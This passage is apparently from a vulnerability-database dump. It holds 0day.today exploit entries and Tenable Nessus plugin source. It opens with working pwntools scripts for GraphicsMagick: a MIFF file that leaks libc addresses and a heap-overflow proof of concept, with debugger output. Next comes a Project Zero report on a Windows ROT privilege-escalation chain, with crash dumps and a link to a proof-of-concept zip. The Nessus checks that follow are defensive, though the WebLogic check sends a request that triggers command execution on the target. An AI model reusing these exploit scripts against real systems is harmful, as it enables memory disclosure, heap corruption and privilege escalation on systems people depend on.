Process \u2018/usr/bin/gm\u2019 stopped with exit code 0 (pid 20019)\r\n[*] Main Arena Leak: 0x7f72948adb98\r\n[*] libc Base: 0x7f72944e9000\r\n \r\n#!/usr/bin/python\r\n# GraphicsMagick IPTC Profile libc Leak\r\n \r\nfrom pwn import *\r\n \r\ndirectory = \"DIR\"\r\npartitions = ('id=ImageMagick version=1.0\\nclass=DirectClass matte=False\\n' +\r\n 'columns=1 rows=1 depth=16\\nscene=1\\nmontage=1x1+0+0\\nprofil' +\r\n 'e-iptc=',\r\n '\\n\\x0c\\n:\\x1a',\r\n '\\n\\x00',\r\n '\\n\\x00\\xbe\\xbe\\xbe\\xbe\\xbe\\xbe\\n')\r\noutput = \"readexploit.miff\"\r\nlength = 8\r\n \r\n#libc_main_arena_entry_offset = 0x3c4ba8\r\nlibc_main_arena_entry_offset = 0x3c4b98\r\n \r\ndef main():\r\n data = \"AAA\" + \"\\x1c\" + \"\\x00\" + chr(10) + p16(0x8, endian=\"big\")\r\n header = partitions[0] + str(length) + partitions[1]\r\n payload = header + directory + partitions[2] + data + partitions[3]\r\n file(output, \"w\").write(payload)\r\n \r\n p = process(executable=\"gm\", argv=[\"identify\", \"-verbose\", output])\r\n output_leak = p.recvall()\r\n priority_offset = output_leak.index(\"Priority:\") + 12\r\n montage_offset = output_leak.index(\"Montage:\") - 3\r\n leak = output_leak[priority_offset:montage_offset]\r\n if \"0x00000000\" in leak:\r\n log.info(\"Unlucky run. Value corrupted by StringToList\")\r\n exit()\r\n main_arena_leak = u64(leak.ljust(8, \"\\x00\"))\r\n log.info(\"Main Arena Leak: 0x%x\" % main_arena_leak)\r\n libc_base = main_arena_leak - libc_main_arena_entry_offset\r\n log.info(\"libc Base: 0x%x\" % libc_base)\r\n \r\nif __name__ == \"__main__\":\r\n main()\r\n \r\n \r\nHeap Overflow\r\nGraphicsMagick is vulnerable to a heap overflow vulnerability found in DescribeImage() function of the magick/describe.c file.\r\n \r\nThe call to strncpy on line 855 does not limit the size to be copied to the size of the buffer copied to. 
Instead, the size is calculated by searching for a newline or a null byte in the directory name.\r\n \r\n844 /*\r\n845 Display visual image directory.\r\n846 */\r\n847 image_info=CloneImageInfo((ImageInfo *) NULL);\r\n848 (void) CloneString(&image_info->size,\"64x64\");\r\n849 (void) fprintf(file,\" Directory:\\n\");\r\n850 for (p=image->directory; *p != '\\0'; p++)\r\n851 {\r\n852 q=p;\r\n853 while ((*q != '\\n') && (*q != '\\0'))\r\n854 q++;\r\n855 (void) strncpy(image_info->filename,p,q-p);\r\n856 image_info->filename[q-p]='\\0';\r\n857 p=q;\r\n...\r\n880 }\r\n881 DestroyImageInfo(image_info);\r\n \r\nSince the field filename in the ImageInfo struct has the static size of 2053, the heap can be corrupted by forging an overly long directory name.\r\n \r\n \r\ntype = struct _ImageInfo {\r\n...\r\n FILE *file;\r\n char magick[2053];\r\n char filename[2053];\r\n _CacheInfoPtr_ cache;\r\n void *definitions;\r\n Image *attributes;\r\n unsigned int ping;\r\n PreviewType preview_type;\r\n unsigned int affirm;\r\n _BlobInfoPtr_ blob;\r\n size_t length;\r\n char unique[2053];\r\n char zero[2053];\r\n unsigned long signature;\r\n}\r\n \r\nOne possible way to trigger the vulnerability is to run the identify command on a specially crafted MIFF format file with the verbose flag.\r\n \r\nProof of Concept\r\nThe following proof of concept script will generate a specially crafted MIFF file exploit.miff.\r\n'''\r\n \r\n#!/usr/bin/python\r\n \r\nfrom pwn import *\r\n \r\npartitions = ('id=ImageMagick version=1.0\\nclass=DirectClass matte=False\\n' +\r\n 'columns=1 rows=1 depth=16\\nscene=1\\nmontage=1x1+0+0\\n\\x0c\\n' +\r\n ':\\x1a',\r\n '\\n\\x00\\xbe\\xbe\\xbe\\xbe\\xbe\\xbe\\n')\r\noutput = \"exploit.miff\"\r\n \r\ndef main():\r\n payload = \"A\"*10000\r\n payload = partitions[0] + payload + partitions[1]\r\n file(output, \"w\").write(payload)\r\n \r\nif __name__ == \"__main__\":\r\n main()\r\n \r\n''' \r\nRunning the GraphicsMagick gm utility with the arguments identify 
-verbose in GDB and breaking after the vulnerable strncpy call, and examining the corrupted ImageInfo object demonstrates that the heap corruption was successful.\r\n \r\n \r\ngef\u27a4 r identify -verbose exploit.miff\r\n...\r\ngef\u27a4 br describe.c:856\r\nBreakpoint 1 at 0x4571df: file magick/describe.c, line 856.\r\n...\r\ngef\u27a4 p *image_info\r\n$3 = {\r\n...\r\n compression = UndefinedCompression,\r\n file = 0x0,\r\n magick = '\\000' <repeats 2052 times>,\r\n filename = 'A' <repeats 2053 times>,\r\n cache = 0x4141414141414141,\r\n definitions = 0x4141414141414141,\r\n attributes = 0x4141414141414141,\r\n ping = 0x41414141,\r\n preview_type = 1094795585,\r\n affirm = 0x41414141,\r\n blob = 0x4141414141414141,\r\n length = 0x4141414141414141,\r\n unique = 'A' <repeats 2053 times>,\r\n zero = 'A' <repeats 2053 times>,\r\n signature = 0x4141414141414141\r\n}\r\n'''\n\n# 0day.today [2018-04-02] #", "sourceHref": "https://0day.today/exploit/28948", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-01-05T05:13:31", "bulletinFamily": "exploit", "description": "Exploit for windows platform in category local exploits", "modified": "2017-05-17T00:00:00", "published": "2017-05-17T00:00:00", "href": "https://0day.today/exploit/description/27797", "id": "1337DAY-ID-27797", "type": "zdt", "title": "Microsoft Windows - Running Object Table Register ROTFLAGS_ALLOWANYCLIENT Privilege Escalation Explo", "sourceData": "Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1112\r\n \r\nWindows: Running Object Table Register ROTFLAGS_ALLOWANYCLIENT EoP\r\nPlatform: Windows 10 10586/14393 not tested 8.1 Update 2 or Windows 7\r\nClass: Elevation of Privilege\r\n \r\nSummary:\r\nBy setting an appropriate AppID it\u2019s possible for a normal user process to set a global ROT entry. 
This can be abused to elevate privileges.\r\n \r\nDescription:\r\n \r\nNOTE: I\u2019m not sure which part of this chain to really report. As far as I can tell it\u2019s pretty much all by design and fixing the initial vector seems difficult. Perhaps this is only a bug which can be fixed to prevent sandbox escapes?\r\n \r\nWhen registering an object in the ROT the default is to only expose that registration to the same user identity on the same desktop/window station. This includes preventing the same user at different ILs (such as between sandbox and normal user) from seeing the same registration. However it could be imagined that you might want to register an entry for all users/contexts so IRunningObjectTable::Register takes a grfFlags parameter with the value ROTFLAGS_ALLOWANYCLIENT which allows the ROT entry to be exposed to all users. \r\n \r\nThe description of this flag indicates it can only be used if the COM process is a Local Service or a RunAs application. In fact there\u2019s an explicit ROTFlags value for the AppID which would grant the privilege to a normal application. Quick testing proves this to be correct, a \u201cnormal\u201d application cannot expose the ROT entry to any client as RPCSS does a check that the calling process is allowed to expose the entry. However there are two clear problems with the check. Creating a RunAs COM object in the current session would typically run at the same privilege level as the caller, therefore an application which wanted to abuse this feature could inject code into that process. Secondly while it\u2019s not possible to register a per-user COM object which specifies a RunAs AppID it\u2019s possible to explicitly set the AppID when calling CoInitializeSecurity (either via the GUID or by naming your program to match one which maps to the correct AppID).\r\n \r\nTherefore in the current implementation effectively any process, including sandboxed ones should be able to register a global ROT entry. 
What can we do with this? The ROT is mainly used for OLE duties, for example Word and Visual Studio register entries for each document/project open. It would be nice not to rely on this, so instead I\u2019ll abuse another OLE component, which we\u2019ve seen before, the fact that LoadTypeLib will fall back to a moniker if it can\u2019t find the type library file specified.\r\n \r\nIf the file loading fails then LoadTypeLib will effectively call MkParseDisplayName on the passed in string. One of the things MPDN does is try and create a file moniker with the string passed in as an argument. File Monikers have an interesting feature, the COM libraries will check if there\u2019s a registered ROT entry for this file moniker already present, if it is instead of creating a new object it will call IRunningObjectTable::GetObject instead when binding. So as we can register a ROT entry for any user in any context we can provide our own implementation of ITypeLib running inside our process, by registering it against the path to the type library any other process which tries to open that library would instead get our spoofed one, assuming we can force the file open to fail.\r\n \r\nThis is the next key part, looking at the LoadTypeLib implementation the code calls FindTypeLib if this function fails the code will fall back to the moniker route. There\u2019s two opportunities here, firstly CreateFile is called on the path, we could cause this to fail by opening the file with no sharing mode, in theory it should fail. However in practice it doesn\u2019t most type libraries are in system location, if you don\u2019t have the possibility of write permission on the file the OS automatically applies FILE_SHARE_READ which makes it impossible to lock the file in its entirety. Also some TLBs are stored inside a DLL which is then used so this route is out. Instead the other route is more promising, VerifyIsExeOrTlb is called once the file is open to check the type of file to parse. 
This function tries to load the first 64 bytes and checks for magic signatures. We can cause the read to fail by using the LockFile API to put an exclusive lock on that part of the file. This also has the advantage that it doesn\u2019t affect file mappings so will also work with loaded DLLs. \r\n \r\nWe now can cause any user of a type library to get redirected to our \u201cfake\u201d one without abusing impersonation/symbolic link tricks. How can we use this to our advantage? The final trick is to abuse again the auto-generation of Stubs/Proxies from automation compatible interfaces. If we can get a more privileged process to use our type library when creating a COM stub we can cause a number of memory safety issues such as type confusion, arbitrary memory read/writes and extending the vtable to call arbitrary functions. This is an extremely powerful primitive, as long as you can find a more privileged process which uses a dual automation interface. For example the FlashBroker which is installed on every Win8+ machine is intentionally allowed to be created by sandboxed IE/Edge and uses dual interfaces with auto-generated Stubs. We could abuse for example the BrokerPrefSetExceptionDialogSize and BrokerPrefGetExceptionDialogSize to do arbitrary memory writes. This all works because the stub creation has no was of ensuring that the actual server implementation matches the generated stub (at least without full symbols) so it will blindly marshal pointers or call outside of the object's vtable.\r\n \r\nProof of Concept:\r\n \r\nI\u2019ve provided a PoC as a C# project. You need to compile it first. It fakes out the Windows Search Service\u2019s type library to modify the IGatherManagerAdmin2::GetBackoffReason method so that instead of marshaling a pointer to an integer for returning the caller can specify an arbitrary pointer value. When the method on the server side completes it will try and write a value to this address which will cause a Write AV. 
The Windows Search service would be ideal for abuse but many of the functions seem to require Administrator access to call. That\u2019s not to say you couldn\u2019t convert this into a full working exploit but I didn\u2019t.\r\n \r\n1) Compile the C# project. It should be compiled as a 64 bit executable.\r\n2) Restart the Windows Search service just to ensure it hasn\u2019t cached the stub previously. This probably isn\u2019t necessary but just to be certain.\r\n3) Attach a debugger to SearchIndexer.exe to catch the crash.\r\n4) Execute the PoC as a normal user (do not run under the VSHOST as the CoInitializeSecurity call will fail). You need to pass the path to the provided mssitlb.tlb file which has been modified appropriately.\r\n5) The service should crash trying to write a value to address 0x12345678\r\n \r\nCrash Dump:\r\n \r\n0:234> r\r\nrax=0000015ee04665a0 rbx=0000015ee0466658 rcx=0000015ee0466658\r\nrdx=0000000000000000 rsi=0000000000000004 rdi=0000000000000000\r\nrip=00007fff80e3a75d rsp=00000036541fdae0 rbp=00000036541fdb20\r\n r8=00000036541fd868 r9=0000015ee3bb50b0 r10=0000000000000000\r\nr11=0000000000000246 r12=0000015ee3c02988 r13=00000036541fe1c0\r\nr14=0000000012345678 r15=0000000000000000\r\niopl=0 nv up ei pl zr na po nc\r\ncs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246\r\nMSSRCH!CGatheringManager::GetBackoffReason+0x8d:\r\n00007fff`80e3a75d 418936 mov dword ptr [r14],esi ds:00000000`12345678=????????\r\n0:234> k\r\n # Child-SP RetAddr Call Site\r\n00 00000036`541fdae0 00007fff`b416d533 MSSRCH!CGatheringManager::GetBackoffReason+0x8d\r\n01 00000036`541fdb10 00007fff`b413b0d0 RPCRT4!Invoke+0x73\r\n02 00000036`541fdb60 00007fff`b2fa479a RPCRT4!NdrStubCall2+0x430\r\n03 00000036`541fe180 00007fff`b3853c93 combase!CStdStubBuffer_Invoke+0x9a [d:\\th\\com\\combase\\ndr\\ndrole\\stub.cxx @ 1446]\r\n04 00000036`541fe1c0 00007fff`b305ccf2 OLEAUT32!CUnivStubWrapper::Invoke+0x53\r\n05 (Inline Function) --------`-------- 
combase!InvokeStubWithExceptionPolicyAndTracing::__l7::<lambda_b8ffcec6d47a5635f374132234a8dd15>::operator()+0x42 [d:\\th\\com\\combase\\dcomrem\\channelb.cxx @ 1805]\r\n06 00000036`541fe210 00007fff`b3001885 combase!ObjectMethodExceptionHandlingAction<<lambda_b8ffcec6d47a5635f374132234a8dd15> >+0x72 [d:\\th\\com\\combase\\dcomrem\\excepn.hxx @ 91]\r\n07 (Inline Function) --------`-------- combase!InvokeStubWithExceptionPolicyAndTracing+0x9e [d:\\th\\com\\combase\\dcomrem\\channelb.cxx @ 1808]\r\n08 00000036`541fe280 00007fff`b3006194 combase!DefaultStubInvoke+0x275 [d:\\th\\com\\combase\\dcomrem\\channelb.cxx @ 1880]\r\n09 (Inline Function) --------`-------- combase!SyncStubCall::Invoke+0x1b [d:\\th\\com\\combase\\dcomrem\\channelb.cxx @ 1934]\r\n0a (Inline Function) --------`-------- combase!SyncServerCall::StubInvoke+0x1b [d:\\th\\com\\combase\\dcomrem\\servercall.hpp @ 736]\r\n0b (Inline Function) --------`-------- combase!StubInvoke+0x297 [d:\\th\\com\\combase\\dcomrem\\channelb.cxx @ 2154]\r\n0c 00000036`541fe4a0 00007fff`b3008b47 combase!ServerCall::ContextInvoke+0x464 [d:\\th\\com\\combase\\dcomrem\\ctxchnl.cxx @ 1568]\r\n0d (Inline Function) --------`-------- combase!CServerChannel::ContextInvoke+0x83 [d:\\th\\com\\combase\\dcomrem\\ctxchnl.cxx @ 1458]\r\n0e (Inline Function) --------`-------- combase!DefaultInvokeInApartment+0x9e [d:\\th\\com\\combase\\dcomrem\\callctrl.cxx @ 3438]\r\n0f 00000036`541fe770 00007fff`b3007ccd combase!AppInvoke+0x8a7 [d:\\th\\com\\combase\\dcomrem\\channelb.cxx @ 1618]\r\n10 00000036`541fe8a0 00007fff`b300b654 combase!ComInvokeWithLockAndIPID+0xb2d [d:\\th\\com\\combase\\dcomrem\\channelb.cxx @ 2686]\r\n11 00000036`541feb30 00007fff`b40fd433 combase!ThreadInvoke+0x1724 [d:\\th\\com\\combase\\dcomrem\\channelb.cxx @ 6954]\r\n12 00000036`541fedc0 00007fff`b40fbed8 RPCRT4!DispatchToStubInCNoAvrf+0x33\r\n13 00000036`541fee10 00007fff`b40fcf04 RPCRT4!RPC_INTERFACE::DispatchToStubWorker+0x288\r\n14 00000036`541fef10 
00007fff`b40f922d RPCRT4!RPC_INTERFACE::DispatchToStubWithObject+0x404\r\n15 00000036`541fefb0 00007fff`b40f9da9 RPCRT4!LRPC_SCALL::DispatchRequest+0x35d\r\n16 00000036`541ff090 00007fff`b40f64dc RPCRT4!LRPC_SCALL::HandleRequest+0x829\r\n17 00000036`541ff180 00007fff`b40f48c9 RPCRT4!LRPC_SASSOCIATION::HandleRequest+0x45c\r\n18 00000036`541ff200 00007fff`b411eaca RPCRT4!LRPC_ADDRESS::ProcessIO+0xb29\r\n19 00000036`541ff350 00007fff`b422e490 RPCRT4!LrpcIoComplete+0x10a\r\n1a 00000036`541ff3f0 00007fff`b422bc66 ntdll!TppAlpcpExecuteCallback+0x360\r\n1b 00000036`541ff4a0 00007fff`b34b8102 ntdll!TppWorkerThread+0x916\r\n1c 00000036`541ff8b0 00007fff`b425c5b4 KERNEL32!BaseThreadInitThunk+0x22\r\n1d 00000036`541ff8e0 00000000`00000000 ntdll!RtlUserThreadStart+0x34\r\n \r\nExpected Result:\r\nNot doing what ever it did.\r\n \r\nObserved Result:\r\nIt did it!\r\n \r\n \r\nProof of Concept:\r\nhttps://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42021.zip\n\n# 0day.today [2018-01-05] #", "sourceHref": "https://0day.today/exploit/27797", "cvss": {"score": 4.4, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "nessus": [{"lastseen": "2019-11-05T10:15:57", "bulletinFamily": "scanner", "description": "The version of Apache ActiveMQ running on the remote host is 5.x prior\nto 5.15.5. 
It is, therefore, affected by multiple vulnerabilities.", "modified": "2019-11-02T00:00:00", "id": "ACTIVEMQ_5_15_5.NASL", "href": "https://www.tenable.com/plugins/nessus/112192", "published": "2018-08-30T00:00:00", "title": "Apache ActiveMQ 5.x < 5.15.5 Multiple Vulnerabilities", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(112192);\n script_version(\"1.6\");\n script_cvs_date(\"Date: 2019/11/04\");\n\n script_cve_id(\n \"CVE-2012-0881\",\n \"CVE-2014-0114\",\n \"CVE-2015-5182\",\n \"CVE-2016-3092\",\n \"CVE-2016-5425\",\n \"CVE-2016-6325\",\n \"CVE-2016-8735\",\n \"CVE-2018-7489\",\n \"CVE-2018-8006\"\n );\n script_bugtraq_id(\n 67121,\n 68753,\n 91453,\n 93472,\n 93478,\n 94463,\n 103203,\n 105156\n );\n\n script_name(english:\"Apache ActiveMQ 5.x < 5.15.5 Multiple Vulnerabilities\");\n script_summary(english:\"Checks the version of ActiveMQ.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A web application running on the remote host is affected by multiple\n vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Apache ActiveMQ running on the remote host is 5.x prior\nto 5.15.5. 
It is, therefore, affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://activemq.apache.org/activemq-5155-release.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Apache ActiveMQ version 5.15.5 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-7489\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apache Struts ClassLoader Manipulation Remote Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/08/06\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/08/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/08/30\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apache:activemq\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"activemq_web_console_detect.nasl\");\n script_require_keys(\"installed_sw/ActiveMQ\");\n script_require_ports(\"Services/www\", 8161);\n\n exit(0);\n}\n\ninclude(\"http.inc\");\ninclude(\"vcf.inc\");\n\napp = 'ActiveMQ';\nget_install_count(app_name:app, exit_if_zero:TRUE);\n\nport = get_http_port(default:8161);\n\napp_info = vcf::get_app_info(app:app, port:port, webapp:TRUE);\n\nconstraints = [\n { \"min_version\" : \"5.0.0\", \"max_version\" : \"5.15.4\", \"fixed_version\" : \"5.15.5\" }\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE, flags:{xss:TRUE, xsrf:TRUE});\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-11-09T11:17:28", "bulletinFamily": "scanner", "description": "The version of Oracle WebCenter Sites running on the remote host is\naffected by an unspecified flaw in the Sites component (formerly\nFatWire Content Server) that allows an remote attacker to impact\nconfidentiality and integrity. 
Note that this issue only applies\nto versions 11.1.1.8.0, 12.2.1.2.0,and 12.2.1.3.0.", "modified": "2019-11-02T00:00:00", "id": "ORACLE_WEBCENTER_SITES_APR_2018_CPU.NASL", "href": "https://www.tenable.com/plugins/nessus/109209", "published": "2018-04-20T00:00:00", "title": "Oracle WebCenter Sites Remote Vulnerability (April 2018 CPU)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(109209);\n script_version(\"1.8\");\n script_cvs_date(\"Date: 2019/11/08\");\n\n script_cve_id(\"CVE-2016-3092\", \"CVE-2017-12617\", \"CVE-2018-2791\");\n script_bugtraq_id(91453, 100954, 103800);\n\n script_name(english:\"Oracle WebCenter Sites Remote Vulnerability (April 2018 CPU)\");\n script_summary(english:\"Checks the version of Oracle WebCenter Sites.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"An application running on the remote host is affected by a remote\nsecurity vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Oracle WebCenter Sites running on the remote host is\naffected by an unspecified flaw in the Sites component (formerly\nFatWire Content Server) that allows an remote attacker to impact\nconfidentiality and integrity. 
Note that this issue only applies\nto versions 11.1.1.8.0, 12.2.1.2.0,and 12.2.1.3.0.\");\n # https://www.oracle.com/technetwork/security-advisory/cpuapr2018-3678067.html#AppendixFMW\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?4e39ef65\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the appropriate patch according to the April 2018 Oracle\nCritical Patch Update advisory.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-12617\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Apache Tomcat for Windows HTTP PUT Method File Upload\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Tomcat RCE via JSP Upload Bypass');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/04/17\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/04/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/04/20\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:oracle:fusion_middleware\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 
2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"oracle_webcenter_sites_installed.nbin\");\n script_require_keys(\"SMB/WebCenter_Sites/Installed\");\n script_require_ports(\"Services/www\", 7001);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"smb_func.inc\");\n\nport = kb_smb_transport();\n\nget_kb_item_or_exit('SMB/WebCenter_Sites/Installed');\n\nversions = get_kb_list('SMB/WebCenter_Sites/*/Version');\nif (isnull(versions)) exit(1, 'Unable to obtain a version list for Oracle WebCenter Sites.');\n\nreport = '';\n\nforeach key (keys(versions))\n{\n fix = '';\n\n version = versions[key];\n revision = get_kb_item(key - '/Version' + '/Revision');\n path = get_kb_item(key - '/Version' + '/Path');\n\n if (isnull(version) || isnull(revision)) continue;\n\n # Patch 27589552 - 11.1.1.8.0 < Revision 184362 \n if (version =~ \"^11\\.1\\.1\\.8\\.0$\" && revision < 184362)\n fix = '\\n Fixed revision : 184362' +\n '\\n Required patch : 27589552';\n\n# Pending 12.x Fusion Middleware and WebCenter Sites detection fixes\n#\n# # Patch 25806943 - 12.2.1.1.0 < Revision 170415\n# if (version =~ \"^12\\.2\\.1\\.1\\.0$\" && revision < 170415)\n# fix = '\\n Fixed revision : 170415' +\n# '\\n Required patch : 25806943';\n#\n# # Patch 25806946 - 12.2.1.2.0 < Revision 170415\n# if (version =~ \"^12\\.2\\.1\\.2\\.0$\" && revision < 170415)\n# fix = '\\n Fixed revision : 170415' +\n# '\\n Required patch : 25806946';\n#\n if (fix != '')\n {\n if (!isnull(path)) report += '\\n Path : ' + path;\n report += '\\n Version : ' + version +\n '\\n Revision : ' + revision +\n fix + '\\n';\n }\n}\n\nif (report != '') security_report_v4(port:port, extra:report, severity:SECURITY_WARNING);\nelse audit(AUDIT_INST_VER_NOT_VULN, \"Oracle WebCenter Sites\");\n\n\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-11-09T12:01:23", "bulletinFamily": 
"scanner", "description": "The remote Oracle WebLogic server is affected by a remote code\nexecution vulnerability in the WSAT endpoint due to unsafe\ndeserialization of XML encoded Java objects. An unauthenticated,\nremote attacker can exploit this, via a crafted Java object, \nto execute arbitrary Java code in the context of the WebLogic\nserver.", "modified": "2019-11-02T00:00:00", "id": "WEBLOGIC_2017_10271.NASL", "href": "https://www.tenable.com/plugins/nessus/105484", "published": "2017-12-28T00:00:00", "title": "Oracle WebLogic WSAT Remote Code Execution", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(105484);\n script_version(\"1.16\");\n script_cvs_date(\"Date: 2019/11/08\");\n\n script_cve_id(\"CVE-2017-10271\");\n\n script_name(english:\"Oracle WebLogic WSAT Remote Code Execution\");\n script_summary(english:\"Sends an HTTP POST request and looks for DNS response\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Oracle WebLogic server is affected by a remote code\nexecution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Oracle WebLogic server is affected by a remote code\nexecution vulnerability in the WSAT endpoint due to unsafe\ndeserialization of XML encoded Java objects. 
An unauthenticated,\nremote attacker can exploit this, via a crafted Java object, \nto execute arbitrary Java code in the context of the WebLogic\nserver.\");\n # https://www.oracle.com/technetwork/security-advisory/cpuoct2017-3236626.html#AppendixFMW\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?b680917f\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the appropriate patch according to the October 2017 Oracle\nCritical Patch Update advisory.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-10271\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Oracle WebLogic wls-wsat Component Deserialization RCE');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/10/17\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/10/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/12/28\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:oracle:weblogic_server\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"Web Servers\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"weblogic_detect.nasl\");\n script_require_keys(\"www/weblogic\");\n script_require_ports(\"Services/www\", 80, 7001);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\n\nappname = \"Oracle WebLogic Server\";\n\nget_kb_item_or_exit(\"www/weblogic\");\nport = get_http_port(default:7001, embedded:FALSE);\nget_kb_item_or_exit(\"www/weblogic/\" + port + \"/installed\");\n\n# establish if WSAT is enabled. If it isn't then we don't\n# need to proceed any futher\nres = http_send_recv3(\n method:'GET',\n item:'/wls-wsat/CoordinatorPortType',\n port:port,\n exit_on_fail:TRUE);\nif (empty_or_null(res) || '404' >< res[0])\n{\n audit(AUDIT_INST_VER_NOT_VULN, appname);\n}\n\n# generate a unique pattern for each execution. unixtime() is not\n# granular enough since there may be many installs and this script\n# could be running in parallel\npattern = hexstr(rand_str(length:8));\n\n# create the HTTP request that will execute the DNS lookup. We'll try to execute\n# via both cmd and sh since we have no real insight into the remote OS.\n# Because some minimal Linux installs don't include nslookup, we'll also fallback\n# on using ping if necessary... 
